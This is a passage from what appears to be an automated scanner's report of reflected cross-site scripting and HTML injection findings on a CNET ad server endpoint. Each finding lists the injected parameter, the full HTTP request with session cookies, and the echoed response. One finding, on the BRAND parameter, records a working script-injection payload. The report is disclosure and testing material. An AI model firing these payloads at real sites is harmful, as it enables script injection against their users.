6.28. http://mads.cnet.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload a03b0<a>e40f8083930 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5a03b0<a>e40f8083930&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:53 GMT
Server: Apache/2.2
Content-Length: 604
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:35:53 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5a03b0<a>e40f8083930&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD
...[SNIP]...

6.29. http://mads.cnet.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc705"><script>alert(1)</script>4aa2c504d19 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=5fc705"><script>alert(1)</script>4aa2c504d19&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=13060 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:30:20 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 04 May 2011 01:30:20 GMT
Content-Length: 2433

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<img src="http://adlog.com.com/adlog/i/r=13060&amp;sg=512533&amp;o=&amp;h=cn&amp;p=2&amp;b=5fc705"><script>alert(1)</script>4aa2c504d19&amp;l=en_US&amp;site=3&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=01phx1-ad-e16:4DC066DE4A6633&amp;orh=admeld.com&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld
...[SNIP]...

6.30. http://mads.cnet.com/mac-ad [CARRIER parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the CARRIER request parameter is copied into the HTML document as plain text between tags. The payload 7d834<a>c27462c4717 was submitted in the CARRIER parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%207d834<a>c27462c4717&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:34:51 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:34:51 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%207d834<a>c27462c4717&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-A
...[SNIP]...

6.31. http://mads.cnet.com/mac-ad [CELT parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 11f74<a>8d02a022973 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?CELT=ifc11f74<a>8d02a022973&BRAND=5&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=13060 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:48 GMT
Server: Apache/2.2
Content-Length: 389
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Wed, 04 May 2011 01:29:48 GMT

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="CELT=ifc11f74<a>8d02a022973&BRAND=5&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=13060" _REQ_NUM="0" --><!-- MAC-AD STATUS: ; MAPPING UNEXPECTED CELT &quot;ifc11f74
...[SNIP]...

6.32. http://mads.cnet.com/mac-ad [CID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the CID request parameter is copied into the HTML document as plain text between tags. The payload 3d24d<a>ffba15ebc0a was submitted in the CID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=23d24d<a>ffba15ebc0a&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:33:16 GMT
Server: Apache/2.2
Content-Length: 621
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:33:16 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=23d24d<a>ffba15ebc0a&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesO
...[SNIP]...

6.33. http://mads.cnet.com/mac-ad [CNET-PAGE-GUID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the CNET-PAGE-GUID request parameter is copied into the HTML document as plain text between tags. The payload 4b804<a>92426b57967 was submitted in the CNET-PAGE-GUID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs4b804<a>92426b57967&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:37:03 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:37:03 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs4b804<a>92426b57967&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT=
...[SNIP]...

6.34. http://mads.cnet.com/mac-ad [COOKIE%3AANON_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the COOKIE%3AANON_ID request parameter is copied into the HTML document as plain text between tags. The payload 51d24<a>369b9fd8ded was submitted in the COOKIE%3AANON_ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs51d24<a>369b9fd8ded&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:39 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:38:39 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs51d24<a>369b9fd8ded&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT='17939:' CID='2' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-Js
...[SNIP]...

6.35. http://mads.cnet.com/mac-ad [DVAR_INSTLANG parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload d17f2<a>71883aa5e1a was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-USd17f2<a>71883aa5e1a&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:08 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:38:08 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-USd17f2<a>71883aa5e1a&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT='17939:' CID='2' TO BEACON TEXT)
...[SNIP]...

6.36. http://mads.cnet.com/mac-ad [GLOBAL&CLIENT:ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload ca78d<a>d55f1811ef9 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJSca78d<a>d55f1811ef9&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:30:20 GMT
Server: Apache/2.2
Content-Length: 604
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:30:20 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJSca78d<a>d55f1811ef9&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_
...[SNIP]...

6.37. http://mads.cnet.com/mac-ad [MFG parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the MFG request parameter is copied into the HTML document as plain text between tags. The payload 93406<a>7fc7d9d19ca was submitted in the MFG parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%2093406<a>7fc7d9d19ca&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

